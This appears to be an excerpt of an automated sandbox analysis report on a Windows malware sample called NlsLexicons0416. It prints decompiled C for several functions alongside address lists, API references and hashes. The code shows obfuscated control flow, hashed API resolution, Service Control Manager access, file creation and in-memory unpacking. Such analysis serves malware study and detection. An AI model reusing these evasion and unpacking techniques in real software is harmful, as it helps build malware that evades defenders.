                                                                                0x003e5153
                                                                                0x003e5158
                                                                                0x003e515a
                                                                                0x003e516d
                                                                                0x003e5172
                                                                                0x003e5172
                                                                                0x003e5179
                                                                                0x003e517b
                                                                                0x003e5180
                                                                                0x003e5182
                                                                                0x003e5195
                                                                                0x003e519a
                                                                                0x003e519a
                                                                                0x003e51a3
                                                                                0x003e51a5
                                                                                0x00000000
                                                                                0x003e5101
                                                                                0x003e5101
                                                                                0x003e5107
                                                                                0x00000000
                                                                                0x003e510d
                                                                                0x003e510d
                                                                                0x003e5112
                                                                                0x003e5114
                                                                                0x003e5127
                                                                                0x003e512c
                                                                                0x003e512c
                                                                                0x003e5139
                                                                                0x003e513b
                                                                                0x003e513d
                                                                                0x003e514b
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e5107
                                                                                0x003e507a
                                                                                0x003e507a
                                                                                0x003e50c2
                                                                                0x003e50c7
                                                                                0x003e50c9
                                                                                0x003e50dc
                                                                                0x003e50e1
                                                                                0x003e50e1
                                                                                0x003e50ed
                                                                                0x00000000
                                                                                0x003e507c
                                                                                0x003e5082
                                                                                0x003e50ad
                                                                                0x003e50b0
                                                                                0x003e50b2
                                                                                0x003e50ba
                                                                                0x00000000
                                                                                0x003e5084
                                                                                0x003e508a
                                                                                0x00000000
                                                                                0x003e5090
                                                                                0x003e509a
                                                                                0x003e50a8
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x00000000
                                                                                0x003e505c
                                                                                0x003e505c
                                                                                0x003e508a
                                                                                0x003e5082
                                                                                0x003e507a
                                                                                0x00000000
                                                                                0x003e5078

                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,003E8AC8,?,3251FEFE,?,?), ref: 003E5355
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID:
                                                                                • API String ID: 1279760036-0
                                                                                • Opcode ID: 133d7f2ca5510ac489f825c25ec4a53eaa06e005271f18bdac58970ca82bde36
                                                                                • Instruction ID: 35d7fc1f7d1e6bad15e6cd8394cd28a72521c73478c107b9ddd4e37f4ab40a6e
                                                                                • Opcode Fuzzy Hash: 133d7f2ca5510ac489f825c25ec4a53eaa06e005271f18bdac58970ca82bde36
                                                                                • Instruction Fuzzy Hash: 4681F532B447B58BDF22AF7B8C8572A36DE9B94748F020769F901DF2D1EA218D014BC1
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E9860, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 195serviceCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                C-Code - Quality: 73%
                                                                                			E003E9860() {
				char _v524;
				unsigned int _v528;
				char _v536;
				void* _v544;
				void* __ebx;
				void* __ebp;
				void* _t28;
				void* _t29;
				void* _t31;
				void* _t37;
				void* _t39;
				void* _t40;
				void* _t47;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t62;
				void* _t64;
				void* _t69;
				void* _t72;
				void* _t92;
				void* _t93;
				intOrPtr _t94;
				void* _t97;
				void* _t98;

				_t64 = 0;
				_t28 = 0x29f9e503;
				_t92 = _v528;
				_t2 = _t64 + 1; // 0x1
				_t94 = _t2;
				goto L1;
				do {
					while(1) {
						L1:
						_t97 = _t28 - 0x13fee53b;
						if(_t97 > 0) {
							break;
						}
						if(_t97 == 0) {
							__eflags =  *0x3ee310;
							if( *0x3ee310 == 0) {
								 *0x3ee310 = E003E3E60(_t64, E003E3F00(0x26f5757c), 0x9ba7cd1, _t94);
							}
							_t49 = OpenSCManagerW(0, 0, 0xf003f); // executed
							_t92 = _t49;
							__eflags = _t92;
							if(_t92 == 0) {
								_t28 = 0x23c48583;
							} else {
								_t50 =  *0x3ee54c; // 0x5ae080
								 *((intOrPtr*)(_t50 + 0x220)) = _t94;
								_t28 = 0xc471eb;
							}
							continue;
						} else {
							_t98 = _t28 - 0x9835f84;
							if(_t98 > 0) {
								__eflags = _t28 - 0xc0f0991;
								if(_t28 != 0xc0f0991) {
									goto L36;
								} else {
									_t69 =  *0x3edbd8;
									__eflags = _t69;
									if(_t69 == 0) {
										_t69 = E003E3E60(_t64, E003E3F00(0xd9518805), 0x141622d6, _t94);
										 *0x3edbd8 = _t69;
									}
									_t53 =  *0x3ee54c; // 0x5ae080
									_t56 =  *_t69(0, _v528, 0, 0, _t53 + 0x18); // executed
									__eflags = _t56;
									_t28 = 0x9835f84;
									_t64 =  ==  ? _t94 : _t64;
									continue;
								}
							} else {
								if(_t98 == 0) {
									E003E7C60(_t94);
									_t28 = 0x6addd5c;
									continue;
								} else {
									if(_t28 == 0xc471eb) {
										_v528 = 0xc1a3;
										_t28 = 0x179ed98e;
										_v528 = _v528 + 0xffff1ad7;
										_v528 = _v528 ^ 0xffffdc53;
										continue;
									} else {
										if(_t28 != 0x6addd5c) {
											goto L36;
										} else {
											_t60 =  *0x3ee3f4;
											if(_t60 == 0) {
												_t60 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x7dc9b9bb, _t94);
												 *0x3ee3f4 = _t60;
											}
											 *_t60(0,  &_v524, 0x104);
											_t62 = E003E3D00( &_v536);
											_t72 =  *0x3ee54c; // 0x5ae080
											 *((intOrPtr*)(_t72 + 0x46c)) = _t62;
											_t28 = 0x39ea8110;
											continue;
										}
									}
								}
							}
						}
						L42:
					}
					__eflags = _t28 - 0x29f9e503;
					if(__eflags > 0) {
						__eflags = _t28 - 0x39ea8110;
						if(_t28 == 0x39ea8110) {
							_t29 =  *0x3edbd8;
							__eflags = _t29;
							if(_t29 == 0) {
								_t29 = E003E3E60(_t64, E003E3F00(0xd9518805), 0x141622d6, _t94);
								 *0x3edbd8 = _t29;
							}
							 *_t29(0, 0x25, 0, 0,  &_v524);
							_t31 =  *0x3ee54c; // 0x5ae080
							_t32 = _t31 + 0x234;
							__eflags = _t31 + 0x234;
							E003E3040(_t32);
							goto L41;
						} else {
							goto L36;
						}
					} else {
						if(__eflags == 0) {
							_t37 =  *0x3ee494;
							__eflags = _t37;
							if(_t37 == 0) {
								_t37 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x7facde30, _t94);
								 *0x3ee494 = _t37;
							}
							_t93 =  *_t37();
							_t39 =  *0x3edd18;
							__eflags = _t39;
							if(_t39 == 0) {
								_t39 = E003E3E60(_t64, E003E3F00(0x9bab0b12), 0x9ff0609c, _t94);
								 *0x3edd18 = _t39;
							}
							_t40 =  *_t39(_t93, 8, 0x480);
							 *0x3ee54c = _t40;
							__eflags = _t40;
							if(_t40 == 0) {
								L41:
								return _t64;
							} else {
								 *((intOrPtr*)(_t40 + 4)) = E003E7E40;
								_t28 = 0x13fee53b;
								goto L1;
							}
						} else {
							__eflags = _t28 - 0x179ed98e;
							if(_t28 == 0x179ed98e) {
								__eflags =  *0x3ee18c;
								if( *0x3ee18c == 0) {
									 *0x3ee18c = E003E3E60(_t64, E003E3F00(0x26f5757c), 0x268fe5f0, _t94);
								}
								CloseServiceHandle(_t92); // executed
								_t28 = 0xc0f0991;
								goto L1;
							} else {
								__eflags = _t28 - 0x23c48583;
								if(_t28 != 0x23c48583) {
									goto L36;
								} else {
									_v528 = 0x5332;
									_v528 = _v528 << 6;
									_v528 = _v528 >> 0xf;
									_v528 = _v528 + 0xffffb18f;
									_v528 = _v528 >> 3;
									_v528 = _v528 ^ 0x1ffff62b;
									_t47 =  *0x3ee54c; // 0x5ae080
									 *((intOrPtr*)(_t47 + 8)) = 0x3e7e30;
									_t28 = 0xc0f0991;
									goto L1;
								}
							}
						}
					}
					goto L42;
					L36:
					__eflags = _t28 - 0x305b3459;
				} while (_t28 != 0x305b3459);
				return _t64;
				goto L42;
			}






























                                                                                0x003e9868
                                                                                0x003e986a
                                                                                0x003e9871
                                                                                0x003e9875
                                                                                0x003e9875
                                                                                0x003e9878
                                                                                0x003e9880
                                                                                0x003e9880
                                                                                0x003e9880
                                                                                0x003e9880
                                                                                0x003e9885
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e988b
                                                                                0x003e9993
                                                                                0x003e9995
                                                                                0x003e99ad
                                                                                0x003e99ad
                                                                                0x003e99bb
                                                                                0x003e99bd
                                                                                0x003e99bf
                                                                                0x003e99c1
                                                                                0x003e99d8
                                                                                0x003e99c3
                                                                                0x003e99c3
                                                                                0x003e99c8
                                                                                0x003e99ce
                                                                                0x003e99ce
                                                                                0x00000000
                                                                                0x003e9891
                                                                                0x003e9891
                                                                                0x003e9896
                                                                                0x003e9936
                                                                                0x003e993b
                                                                                0x00000000
                                                                                0x003e9941
                                                                                0x003e9941
                                                                                0x003e9947
                                                                                0x003e9949
                                                                                0x003e9961
                                                                                0x003e9963
                                                                                0x003e9963
                                                                                0x003e9969
                                                                                0x003e997d
                                                                                0x003e997f
                                                                                0x003e9981
                                                                                0x003e9986
                                                                                0x00000000
                                                                                0x003e9986
                                                                                0x003e989c
                                                                                0x003e989c
                                                                                0x003e9927
                                                                                0x003e992c
                                                                                0x00000000
                                                                                0x003e98a2
                                                                                0x003e98a7
                                                                                0x003e9905
                                                                                0x003e990d
                                                                                0x003e9912
                                                                                0x003e991a
                                                                                0x00000000
                                                                                0x003e98a9
                                                                                0x003e98ae
                                                                                0x00000000
                                                                                0x003e98b4
                                                                                0x003e98b4
                                                                                0x003e98bb
                                                                                0x003e98ce
                                                                                0x003e98d3
                                                                                0x003e98d3
                                                                                0x003e98e4
                                                                                0x003e98ea
                                                                                0x003e98ef
                                                                                0x003e98f5
                                                                                0x003e98fb
                                                                                0x00000000
                                                                                0x003e98fb
                                                                                0x003e98ae
                                                                                0x003e98a7
                                                                                0x003e989c
                                                                                0x003e9896
                                                                                0x00000000
                                                                                0x003e988b
                                                                                0x003e99e2
                                                                                0x003e99e7
                                                                                0x003e9ae3
                                                                                0x003e9ae8
                                                                                0x003e9b02
                                                                                0x003e9b07
                                                                                0x003e9b09
                                                                                0x003e9b1c
                                                                                0x003e9b21
                                                                                0x003e9b21
                                                                                0x003e9b33
                                                                                0x003e9b35
                                                                                0x003e9b3e
                                                                                0x003e9b3e
                                                                                0x003e9b44
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e99ed
                                                                                0x003e99ed
                                                                                0x003e9a73
                                                                                0x003e9a78
                                                                                0x003e9a7a
                                                                                0x003e9a8d
                                                                                0x003e9a92
                                                                                0x003e9a92
                                                                                0x003e9a99
                                                                                0x003e9a9b
                                                                                0x003e9aa0
                                                                                0x003e9aa2
                                                                                0x003e9ab5
                                                                                0x003e9aba
                                                                                0x003e9aba
                                                                                0x003e9ac7
                                                                                0x003e9ac9
                                                                                0x003e9ace
                                                                                0x003e9ad0
                                                                                0x003e9b4f
                                                                                0x003e9b58
                                                                                0x003e9ad2
                                                                                0x003e9ad2
                                                                                0x003e9ad9
                                                                                0x00000000
                                                                                0x003e9ad9
                                                                                0x003e99f3
                                                                                0x003e99f3
                                                                                0x003e99f8
                                                                                0x003e9a47
                                                                                0x003e9a49
                                                                                0x003e9a61
                                                                                0x003e9a61
                                                                                0x003e9a67
                                                                                0x003e9a69
                                                                                0x00000000
                                                                                0x003e99fa
                                                                                0x003e99fa
                                                                                0x003e99ff
                                                                                0x00000000
                                                                                0x003e9a05
                                                                                0x003e9a05
                                                                                0x003e9a0d
                                                                                0x003e9a12
                                                                                0x003e9a17
                                                                                0x003e9a1f
                                                                                0x003e9a24
                                                                                0x003e9a2c
                                                                                0x003e9a31
                                                                                0x003e9a38
                                                                                0x00000000
                                                                                0x003e9a38
                                                                                0x003e99ff
                                                                                0x003e99f8
                                                                                0x003e99ed
                                                                                0x00000000
                                                                                0x003e9aea
                                                                                0x003e9aea
                                                                                0x003e9aea
                                                                                0x003e9b01
                                                                                0x00000000

                                                                                APIs
                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,005AE068), ref: 003E997D
                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 003E99BB
                                                                                • CloseServiceHandle.ADVAPI32(?,?,3251FEFE,?,?), ref: 003E9A67
                                                                                • SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?,?,3251FEFE,?,?), ref: 003E9B33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FolderPath$CloseHandleManagerOpenService
                                                                                • String ID: 2S$Y4[0
                                                                                • API String ID: 2382770032-4131004879
                                                                                • Opcode ID: 6e858ea845305272d0ebb7195e93f94b04f317fc2d7a3c04a5650d1a42e61613
                                                                                • Instruction ID: 916a19c5f8574fb7e0b931f9e49c17a3ee4948f88f631a72d591ffa46bb52fd7
                                                                                • Opcode Fuzzy Hash: 6e858ea845305272d0ebb7195e93f94b04f317fc2d7a3c04a5650d1a42e61613
                                                                                • Instruction Fuzzy Hash: B361FA717042A59BD736AF6AAC857BA329DDBD0704F11066EF005DF3E1EA30CD058B92
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E8400, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 172fileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 105 3e8400-3e84df 106 3e84e3-3e84e9 105->106 107 3e84ef 106->107 108 3e85c8-3e85ce 106->108 109 3e866c-3e86b4 call 3eb6e0 107->109 110 3e84f5-3e84fb 107->110 111 3e8630-3e8637 108->111 112 3e85d0-3e85d6 108->112 124 3e85bd-3e85c7 109->124 131 3e86ba 109->131 116 3e84fd-3e8503 110->116 117 3e854a-3e8551 110->117 114 3e8639-3e864f call 3e3f00 call 3e3e60 111->114 115 3e8654-3e8667 111->115 118 3e85d8-3e85e0 112->118 119 3e85b1-3e85b7 112->119 114->115 115->106 125 3e8505-3e850b 116->125 126 3e8543-3e8548 116->126 122 3e856e-3e8591 117->122 123 3e8553-3e8569 call 3e3f00 call 3e3e60 117->123 127 3e85e2-3e85fa call 3e3f00 call 3e3e60 118->127 128 3e8600-3e8624 CreateFileW 118->128 119->106 119->124 146 3e85ae 122->146 147 3e8593-3e85a9 call 3e3f00 call 3e3e60 122->147 123->122 125->119 129 3e8511-3e8518 125->129 126->106 127->128 128->124 132 3e8626-3e862b 128->132 136 3e851a-3e8530 call 3e3f00 call 3e3e60 129->136 137 3e8535-3e8541 129->137 140 3e86bc-3e86be 131->140 141 3e86c4-3e86d1 131->141 132->106 136->137 137->106 140->124 140->141 146->119 147->146
                                                                                C-Code - Quality: 66%
                                                                                			E003E8400(void* __ebx, void* __ebp) {
				short _v524;
				char _v564;
				char _v572;
				struct _SECURITY_ATTRIBUTES* _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				intOrPtr _v596;
				intOrPtr* _t75;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t92;
				intOrPtr* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				signed int _t119;
				void* _t121;
				void* _t122;
				signed int _t123;
				intOrPtr _t124;
				void* _t126;
				void* _t129;

				_t126 = __ebp;
				_t101 = __ebx;
				_v584 = 0xdbec;
				_v584 = _v584 + 0xa437;
				_v584 = _v584 | 0x0afcf5fb;
				_v584 = _v584 ^ 0x9493ba05;
				_v584 = _v584 >> 0xc;
				_v584 = _v584 >> 0xb;
				_v584 = _v584 ^ 0x000001bc;
				_v592 = 0x7d19;
				_v592 = _v592 << 9;
				_v592 = _v592 >> 0xe;
				_v592 = _v592 + 0xffff07e5;
				_v592 = _v592 | 0x8aea6eef;
				_v592 = _v592 + 0xd867;
				_v592 = _v592 + 0x9c41;
				_v592 = _v592 + 0x3de0;
				_v592 = _v592 + 0x218b;
				_v592 = _v592 ^ 0x00014403;
				_v588 = 0x2591;
				_t123 = 0x4a20241;
				_v588 = _v588 * 0x7d;
				_v588 = _v588 + 0x8d68;
				_v588 = _v588 + 0xffff8911;
				_v588 = _v588 * 0x6a;
				_v588 = _v588 + 0xffff93d5;
				_v588 = _v588 ^ 0x07a13cd2;
				_v580 = 0x789;
				_v580 = _v580 >> 1;
				_v580 = _v580 ^ 0xaee58af2;
				_v580 = _v580 ^ 0xaee58936;
				_t122 = _v580;
				goto L1;
				do {
					while(1) {
						L1:
						_t129 = _t123 - 0x1aed34c4;
						if(_t129 > 0) {
							break;
						}
						if(_t129 == 0) {
							_v580 = 0xa8c00;
							_v576 = 0;
							_v596 = E003EB6E0(_v580, _v576, 0x989680, 0);
							_v592 = _t119;
							_t121 = _v588 - _v564;
							_t124 = _v596;
							asm("sbb ecx, [esp+0x3c]");
							__eflags = _v584 - _v592;
							if(__eflags < 0) {
								goto L16;
							} else {
								if(__eflags > 0) {
									L29:
									return 1;
								} else {
									__eflags = _t121 - _t124;
									if(_t121 < _t124) {
										goto L16;
									} else {
										goto L29;
									}
								}
							}
						} else {
							if(_t123 == 0x12f5064) {
								_t82 =  *0x3edec0;
								__eflags = _t82;
								if(_t82 == 0) {
									_t99 = E003E3F00(0x9bab0b12);
									_t119 = 0x8b0c7279;
									_t82 = E003E3E60(_t101, _t99, 0x8b0c7279, _t126);
									 *0x3edec0 = _t82;
								}
								 *_t82(_t122, 0,  &_v564, 0x28);
								asm("sbb esi, esi");
								_t85 =  *0x3ede3c;
								_t123 = (_t123 & 0xf96a5287) + 0x13ef6fdf;
								__eflags = _t85;
								if(_t85 == 0) {
									_t98 = E003E3F00(0x9bab0b12);
									_t119 = 0x20de7595;
									_t85 = E003E3E60(_t101, _t98, 0x20de7595, _t126);
									 *0x3ede3c = _t85;
								}
								 *_t85(_t122);
								goto L15;
							} else {
								if(_t123 == 0x4a20241) {
									_t123 = 0x33602029;
									continue;
								} else {
									if(_t123 != 0xd59c266) {
										goto L15;
									} else {
										_t93 =  *0x3ee1d4;
										if(_t93 == 0) {
											_t97 = E003E3F00(0x9bab0b12);
											_t119 = 0xa229df38;
											_t93 = E003E3E60(_t101, _t97, 0xa229df38, _t126);
											 *0x3ee1d4 = _t93;
										}
										 *_t93( &_v572);
										_t123 = 0x1aed34c4;
										continue;
									}
								}
							}
						}
						L30:
					}
					__eflags = _t123 - 0x33602029;
					if(_t123 == 0x33602029) {
						_t75 =  *0x3ee3f4;
						__eflags = _t75;
						if(_t75 == 0) {
							_t100 = E003E3F00(0x9bab0b12);
							_t119 = 0x7dc9b9bb;
							_t75 = E003E3E60(_t101, _t100, 0x7dc9b9bb, _t126);
							 *0x3ee3f4 = _t75;
						}
						 *_t75(0,  &_v524, 0x104);
						_t123 = 0x3ae77736;
						goto L1;
					} else {
						__eflags = _t123 - 0x3ae77736;
						if(_t123 != 0x3ae77736) {
							goto L15;
						} else {
							__eflags =  *0x3ede04;
							if( *0x3ede04 == 0) {
								_t95 = E003E3F00(0x9bab0b12);
								_t119 = 0xb66d748a;
								 *0x3ede04 = E003E3E60(_t101, _t95, 0xb66d748a, _t126);
							}
							_t92 = CreateFileW( &_v524, _v584, _v592, 0, _v588, _v580, 0); // executed
							_t122 = _t92;
							__eflags = _t122 - 0xffffffff;
							if(_t122 == 0xffffffff) {
								break;
							} else {
								_t123 = 0x12f5064;
								goto L1;
							}
						}
					}
					goto L30;
					L15:
					__eflags = _t123 - 0x13ef6fdf;
				} while (_t123 != 0x13ef6fdf);
				L16:
				__eflags = 0;
				return 0;
				goto L30;
			}






























                                                                                0x003e8400
                                                                                0x003e8400
                                                                                0x003e8406
                                                                                0x003e840e
                                                                                0x003e8416
                                                                                0x003e841e
                                                                                0x003e8426
                                                                                0x003e842b
                                                                                0x003e8430
                                                                                0x003e8438
                                                                                0x003e8440
                                                                                0x003e8445
                                                                                0x003e844a
                                                                                0x003e8452
                                                                                0x003e845a
                                                                                0x003e8462
                                                                                0x003e846a
                                                                                0x003e8472
                                                                                0x003e847a
                                                                                0x003e8482
                                                                                0x003e8491
                                                                                0x003e8496
                                                                                0x003e849a
                                                                                0x003e84a2
                                                                                0x003e84af
                                                                                0x003e84b3
                                                                                0x003e84bb
                                                                                0x003e84c3
                                                                                0x003e84cb
                                                                                0x003e84cf
                                                                                0x003e84d7
                                                                                0x003e84df
                                                                                0x003e84df
                                                                                0x003e84e3
                                                                                0x003e84e3
                                                                                0x003e84e3
                                                                                0x003e84e3
                                                                                0x003e84e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e84ef
                                                                                0x003e866e
                                                                                0x003e8676
                                                                                0x003e8696
                                                                                0x003e869a
                                                                                0x003e86a2
                                                                                0x003e86a6
                                                                                0x003e86aa
                                                                                0x003e86b2
                                                                                0x003e86b4
                                                                                0x00000000
                                                                                0x003e86ba
                                                                                0x003e86ba
                                                                                0x003e86c5
                                                                                0x003e86d1
                                                                                0x003e86bc
                                                                                0x003e86bc
                                                                                0x003e86be
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x003e86be
                                                                                0x003e86ba
                                                                                0x003e84f5
                                                                                0x003e84fb
                                                                                0x003e854a
                                                                                0x003e854f
                                                                                0x003e8551
                                                                                0x003e8558
                                                                                0x003e855d
                                                                                0x003e8564
                                                                                0x003e8569
                                                                                0x003e8569
                                                                                0x003e8578
                                                                                0x003e857c
                                                                                0x003e857e
                                                                                0x003e8589
                                                                                0x003e858f
                                                                                0x003e8591
                                                                                0x003e8598
                                                                                0x003e859d
                                                                                0x003e85a4
                                                                                0x003e85a9
                                                                                0x003e85a9
                                                                                0x003e85af
                                                                                0x00000000
                                                                                0x003e84fd
                                                                                0x003e8503
                                                                                0x003e8543
                                                                                0x00000000
                                                                                0x003e8505
                                                                                0x003e850b
                                                                                0x00000000
                                                                                0x003e8511
                                                                                0x003e8511
                                                                                0x003e8518
                                                                                0x003e851f
                                                                                0x003e8524
                                                                                0x003e852b
                                                                                0x003e8530
                                                                                0x003e8530
                                                                                0x003e853a
                                                                                0x003e853c
                                                                                0x00000000
                                                                                0x003e853c
                                                                                0x003e850b
                                                                                0x003e8503
                                                                                0x003e84fb
                                                                                0x00000000
                                                                                0x003e84ef
                                                                                0x003e85c8
                                                                                0x003e85ce
                                                                                0x003e8630
                                                                                0x003e8635
                                                                                0x003e8637
                                                                                0x003e863e
                                                                                0x003e8643
                                                                                0x003e864a
                                                                                0x003e864f
                                                                                0x003e864f
                                                                                0x003e8660
                                                                                0x003e8662
                                                                                0x00000000
                                                                                0x003e85d0
                                                                                0x003e85d0
                                                                                0x003e85d6
                                                                                0x00000000
                                                                                0x003e85d8
                                                                                0x003e85de
                                                                                0x003e85e0
                                                                                0x003e85e7
                                                                                0x003e85ec
                                                                                0x003e85fa
                                                                                0x003e85fa
                                                                                0x003e861d
                                                                                0x003e861f
                                                                                0x003e8621
                                                                                0x003e8624
                                                                                0x00000000
                                                                                0x003e8626
                                                                                0x003e8626
                                                                                0x00000000
                                                                                0x003e8626
                                                                                0x003e8624
                                                                                0x003e85d6
                                                                                0x00000000
                                                                                0x003e85b1
                                                                                0x003e85b1
                                                                                0x003e85b1
                                                                                0x003e85bd
                                                                                0x003e85bd
                                                                                0x003e85c7
                                                                                0x00000000

                                                                                APIs
                                                                                • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE), ref: 003E861D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295906354.00000000003E1000.00000020.00000001.sdmp, Offset: 003E0000, based on PE: true
                                                                                • Associated: 0000000B.00000002.2295901660.00000000003E0000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295923687.00000000003ED000.00000004.00000001.sdmp Download File
                                                                                • Associated: 0000000B.00000002.2295931048.00000000003EF000.00000002.00000001.sdmp Download File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3e0000_NlsLexicons0416.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: ) `3$) `3$6w:$6w:$=
                                                                                • API String ID: 823142352-4124229693
                                                                                • Opcode ID: 472e57e7293867e5bdb677b111f23773fe849972d95026ace7cdd8784f07b521
                                                                                • Instruction ID: 500c7301910f722470d9a9eff2b538056911c808465b95a28d2e9b6ca39c0e20
                                                                                • Opcode Fuzzy Hash: 472e57e7293867e5bdb677b111f23773fe849972d95026ace7cdd8784f07b521
                                                                                • Instruction Fuzzy Hash: 93610771A083A19FC726DF6AC44966FB7E5ABD0714F008A1CF4999B2E0DB74DD058F82
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003D0D60, Relevance: 9.1, APIs: 6, Instructions: 124memoryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 160 3d0d60-3d0dd5 call 3d0ed0 VirtualAlloc RtlMoveMemory 164 3d0ebe-3d0ec4 160->164 165 3d0ddb-3d0dde 160->165 165->164 166 3d0de4-3d0de6 165->166 166->164 167 3d0dec-3d0df0 166->167 167->164 169 3d0df6-3d0dfd 167->169 170 3d0eaf-3d0ebb 169->170 171 3d0e03-3d0e36 call 3d1140 RtlMoveMemory 169->171 171->164 175 3d0e3c-3d0e4a VirtualAlloc 171->175 176 3d0e4c-3d0e52 175->176 177 3d0e89-3d0ea0 RtlFillMemory 175->177 178 3d0e5a-3d0e68 176->178 179 3d0e54-3d0e56 176->179 177->164 182 3d0ea2-3d0ea5 177->182 178->164 181 3d0e6a-3d0e7d RtlMoveMemory 178->181 179->178 181->164 183 3d0e7f-3d0e83 181->183 182->164 185 3d0ea7-3d0ea9 182->185 183->164 184 3d0e85 183->184 184->177 185->170 185->171
                                                                                APIs
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,00000040), ref: 003D0F08
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,?,000000F8), ref: 003D0F3E
                                                                                  • Part of subcall function 003D0FB0: RtlMoveMemory.NTDLL(00000000,00000000,000000F8), ref: 003D0F7F
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 003D0DB4
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003D0DC3
                                                                                  • Part of subcall function 003D1140: lstrcpynW.KERNEL32(00000000,00000000,00000000,00000010,003D0EFD,00000000), ref: 003D1155
                                                                                • RtlMoveMemory.NTDLL(00000000,-00000018,00000028), ref: 003D0E11
                                                                                • VirtualAlloc.KERNEL32(?,?,00000000,?,?), ref: 003D0E3D
                                                                                • RtlMoveMemory.NTDLL(00000000,?,?), ref: 003D0E6C
                                                                                • RtlFillMemory.KERNEL32(00000000,?,00000000), ref: 003D0E98
                                                                                Memory Dump Source
                                                                                • Source File: 0000000B.00000002.2295897872.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_11_2_3d0000_NlsLexicons0416.jbxd
                                                                                Similarity
                                                                                • API ID: Memory$Move$AllocVirtual$Filllstrcpyn
                                                                                • String ID:
                                                                                • API String ID: 3581289920-0
                                                                                • Opcode ID: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction ID: 9e8b7cd3626e0777be05d41af131ce27bf54b48a4c8f0476ff1bda202279b9a1
                                                                                • Opcode Fuzzy Hash: 98a03950a6b87b5ad15d3b8fee512a0dc4eebefe5bb086351cc2e195eb997952
                                                                                • Instruction Fuzzy Hash: 1731F473A043406BD32AEB60EC44BAB73E9EBC8B80F044D2EB548D7351D635D880C762
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 003E7120, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 107libraryCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
